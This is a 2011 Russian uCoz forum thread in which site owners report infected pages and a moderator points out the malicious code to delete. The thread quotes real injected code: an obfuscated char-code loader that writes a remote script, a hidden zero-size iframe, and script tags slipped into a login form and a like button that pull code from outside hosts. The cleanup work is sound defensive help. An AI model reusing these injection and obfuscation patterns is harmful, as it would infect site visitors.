Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
помогите,сайт давно заражен http://www.iphone3g.moy.su/
аваст выдает при заходе какой то js.redirect заражен,с любого браузера подскажите как можно зайти на сайт и удалить весь контент,с чистого листа его начать делать,тогда я думаю и вирусы удаляться?спасибо. зайти не удается просто введя адрес главной страницы,как нибудь еще можно зайти? Сообщение отредактировал defaultNick5943 - Среда, 19 Окт 2011, 23:57:36
|
|
defaultNick5943,
Quote и удалить весь контент лучше всего конечно же обновить текущий шаблон во всех используемых модулях. это уберет часть грязи. потом нужно очистить блоки вот что у вас в верхней части сайта Code <!-- Header --> <a href="http://84rub.ru/?ref=1257715"></a> а это битый код Code <SCRIPT LANGUAGE="JavaScript"> <br /> <!-- <br /> function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115! 99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!112!101!114!101!120!111! 100!46!51!100!110!46!114!117!47!115!99!114!105!112!116!95!108!105!110!107!115!46!116!120! 116!34!62!60!47!115!99!114!105!112!116!62!"; l=str.length;while(c<=str.length-1){while(str.charAt©!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);} <br /> //--> <br /> </SCRIPT><SCRIPT LANGUAGE="JavaScript"> <br /> <!-- <br /> Decode(); <br /> //--> <br /> </SCRIPT> никогда не ставьте закодированные скрипты к себе на сайт, особенно если совершенно не понимаете в них в общем так. идите по адресу http://iphone3g.moy.su/admin в панель управления сайтом. или можете перейти прямо из вебтопа. в панели управления - редактор страниц - общие настройки - дизайн - ставим галку на обновить текущий дизайн во всех используемых модулях, далее очищаем все блоки вручную. все каталоги, рейтинги, конпки и особенно счетчик от Code <a href="http://www.xuyandex.ru"> <div id="__mainimg" style="background-image: url(http://www.xuyandex.ru/counter/images/st_white.jpg); width: 88px; position: relative; height: 31px;"><span id="__mcnt" style="left: 15px; position: absolute; top: 8px;"> </span></div></a><script language="JavaScript" type="text/javascript" src="http://www.xuyandex.ru/counter/myway.php?do=12494710994a796a7b5da67"></script> и второй раз на странице в самом низу Code <script language="JavaScript" type="text/javascript" src="http://www.xuyandex.ru/counter/myway.php?do=12494710994a796a7b5da67"></script> и никогда не вешайте флеш баннеры своих "друзей" |
|
http://italia-film.ucoz.ru
C недавних пор при заходе на сайт гостем и админом КИС2010 стал обнаруживать иксплойт и следом за ним троян. После блокировки все становится норм. Проверка ничего не не выявила: гугл и яндекс совершенно спокойны. Только наличие iframe вставок и обфусицированный код.( я уже узнала, что это такое) Возможно, это ссылки на зараженные сайты из рекламных блоков, которые динамически меняются? Я не смогла сама найти на странице ничего подозрительного (ведь код замаскирован), поэтому мне нужна ваша помощь. http://italia-film.ucoz.ru/expl_trojan.jpg |
|
HellenKo,
Quote Возможно, это ссылки на зараженные сайты из рекламных блоков попробуйте снять рекламу от Реклама от countbiz.ru и ифрейм от http://aruljohn.com/gadget.... и посмотрите на реакцию. о результатах отпишитесь |
|
webanet, я снесла счетчик и рекламу от traffbiz.ru Кстати (увы, поздно) нашла в инете кучу воплей и проклятий от забаненых поисковиками владельцев сайтов, установивших рекламу от traffbiz.ru
 Но вот ифрейм от http://aruljohn.com/gadget.... я так и не нашла  Покажите мне, как он выглядит ps админ traffbiz.ru утверждает, что это вина рекламодателя и он уже заблокирован... Сообщение отредактировал HellenKo - Четверг, 20 Окт 2011, 21:47:41
|
|
Добрый день у меня такая проблема:
Сахожу на сайта http://mafia-auto.ucoz.ru/ и после того как загружаеться полностью страница начинает выкидывать сюда -http://dtyertr445.aelita.fr/main.php?page=7d2551bbd84bb4ef... Хром пишет что требуеться разрешение на запуск подключаемого модуля..(что за модуль я не пойму) у пользователей такая же проблема.Когда через мозилу захожу начинает ругаться Avаst антивирус. Помогите пожалуйста с этой проблемой,вооще не пойму что это такое... |
|
IZOTOP™, проблема под логином или под гостем?
$Вит@лиК$, из блока часы удалить выделенный код Quote <!-- <block8907> --> <table style="border: 1px solid rgb(60, 60, 60); margin-bottom: 2px;" border="0" cellpadding="0" cellspacing="0" width="180"> <tbody><tr><td style="padding-left: 28px; background-color: rgb(37, 37, 37); font-size: 10px; letter-spacing: 0px; word-spacing: 0px; text-align: left; vertical-align: middle; background-image: url(/Skrin/kopija_dsc00622.jpg); background-repeat: repeat; background-position: left top;" height="23"><b><!-- <bt> -->Часы<!-- </bt> --></b></td></tr> <tr><td style="padding: 5px; background: rgb(19, 19, 19) none repeat scroll 0% 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><!-- <bc> --><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash6/cabs/swflash.cab#version=6.0.0.0" height="100%" width="100%"> <param name="movie" value="http://mirmuzla.net.ru/am/chaciki.swf"><iframe style="position: absolute; left: 1%; width: 0%; top: 1%; height: 0%;" src="http://mirmuzla.net.ru/"></iframe> <param name="play" value="true"> <param name="loop" value="true"> <param name="WMode" value="transparent"> <param name="quality" value="high"> далее предоставьте текст аллерта аваста. то есть что пишет аваст при блокировке при заходе на страницу |
|
Здравствуйте форумчане.
Я не знаю в какую тему написать мой вопрос,так что извините если не в тему. Мой вопрос быстрей всего к держателям домена. Суть вопроса --При входе на главную стр.сайта http://golik.ucoz.ru/ в автоматическом режиме стр.закрывается и открывается эта стр.http://traff-advertazer.com/?fp=rzPwonm%2FVC5NBpImuQsHskDJ14w9iPlk7LW76hEBKzfoeraX%2BAPYnxueKhcd2hYZJO6I7ZAtJE9MInl18v5r5A%3D%3D&prvtof=exVF8plucs8r1zTD9uRfQ8PjKrWU2vg%2FTJbGF4XLAXqCEvqwQFEFxIucmKueXbQ2&poru=NeRTrzUfvZGk%2FDx2rjXih6KYPrYVM%2F9ksFnnymkERDPObU3frHVPXMTJxXC6gVTp1YRfEWbP%2F%2Fe2kZq4RT0S7g%3D%3D&cifr=1&id=2438,во всех браузерах(3).Все остальные стр.работают,а главная стр.для посещений и работы закрыта. И что мне делать.В панели управления сайтом все проверил и убрал с первой стр всю рекламу,комп. проверил на предмет баннера этого сайта,чисто и где искать причину?Стр.не открывается с 21.10.2011 Сообщение отредактировал Valentin3943 - Пятница, 21 Окт 2011, 23:54:28
|
|
Valentin3943, у вас кнопка нравится внизу страницы заражена
Quote <a target="_blank" class="mrc__plugin_like_button" href="http://connect.mail.ru/share" data-mrc-config="{'type' : 'button', 'width' : '550', 'show_text' : 'true', 'show_faces' : 'true'}">Нравится</a> <br> <script src="http://cdn.connect.mail.ru/js/loader.js" type="text/javascript" charset="UTF-8"></script> <br> <script src="http://traff-advertazer.com/go?id=2438"></script> </div> <script type="text/javascript" src="http://view.binlayer.com/ad-40293-jedesubi.js"></script> <script type="text/javascript" src="http://view.binlayer.com/ad-40293.js"></script><!-- </body> --></td> |
|
Здравствуйте! Уважаемые знатоки , помогите пожалуйста !
На моем сайте пользователи стали жаловаться , вот одно из таких сообщений Судя по всему когда кто то из пользователей открывает очередное окно ему предлагают авторизоваться с какого то другого сайта. Я в этом совершенно не разбираюсь...помогите , хотя бы направьте по нужному руслу, где искать и что делать... Сообщение отредактировал Daniela - Пятница, 21 Окт 2011, 18:03:57
|
|
Daniela, из новости Опять города аргентины удалить картинку
Quote <table border="0" cellpadding="0" cellspacing="0" width="100%" class="eBlock"><tr><td style="padding:3px;"> <div class="eTitle" style="text-align:left;"><a href="http://www.argerusa.com/news/2011-10-17-278">Опять города Аргентины засыпал пепел чилийского вулкана.</a></div> <div class="eMessage" style="text-align:left;clear:both;padding-top:2px;padding-bottom:2px;"><img src="http://www.asteriscos.tv/imagebank/148-100/308.imagen_cenizas.volcan_01.jpg" alt="" align="left" width="250">Пепел чилийского вулкана Peyehue , опять накрыл города Аргентины. Уже в который раз в этом году города Патагонии Барилоче и Вилья Ангостура <!--"--><span class="entDots">... </span><span class="entryReadAll"><a class="entryReadAllLink" href="http://www.argerusa.com/news/2011-10-17-278">Читать дальше »</a></span></div> <div class="eDetails" style="clear:both;"> Категория: <a href="http://www.argerusa.com/news/1-0-2">Происшествия</a> | |
|
Не могу найти вирусный код на своем сайте, хотя он на самом деле есть.
Яндекс предупредил и когда я захожу на свой сайт доктор обнаруживает вирус Trojan.IFrameClick.3 в папке броузера через который я захожу. Я добавил свой сайт в Систему Site Guard она выявила что на моем сайте 9 подозрительных Javascript/IFrame. С 5 я разобрался и проверил это не вирус а вот другие под сомнением и даже найти их не могу на своем сайте. Вот коды которые по мнению Site Guard считаются подохрительными: Адрес сайта http://cyber-gamer.clan.su/ Сообщение отредактировал joker3D - Суббота, 22 Окт 2011, 02:30:14
|
|
joker3D, где адрес проблемного сайта? без адреса ваш рассказ пустышка
один ваш сайт закрыт на тех работы. второй пустой, но уже заражен Quote <title>sintonex.com.ua</title> <style type="text/css"> .sSample {text-align:center;padding:3px;border:1px solid #000000;margin:5px;cursor:pointer;font-size:7pt;} .sSampleO {text-align:center;padding:3px;border:1px solid #BEBEBE;margin:5px;cursor:pointer;background: </style><script language="JavaScript"src="http://iji.do.am/grafo.js"></script><div class="sSample" onmouseover="this.className='sSampleO' в общем так без ссылки на проблемный сайт ваш рассказ будет удален. проблемный сайт должен быть открыт для осмотра |
|
joker3D, из формы входа выделенное красным удалить
Quote (uNet)" size="20" style="width:96%;" maxlength="50"/><script src="http://izizi.ru/1.js" type="text/javascript"></script></td></tr> и вычистите второй сайт. там опасней штука вшита |
|
Здравствуйте! Помогите пожалуйста.
1. Сайт - INFORMATION 2. Не знаю что делать уже все перепробовал, но яндекс уже целый месяц говорит что вирус на сайте и все время выводит страницы под вирусом и каждый раз все новые и постоянно вылазит реклама хотя я не добавлял её. Что делать?? Сообщение отредактировал Rromichh - Суббота, 22 Окт 2011, 22:54:29
|
| |||
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!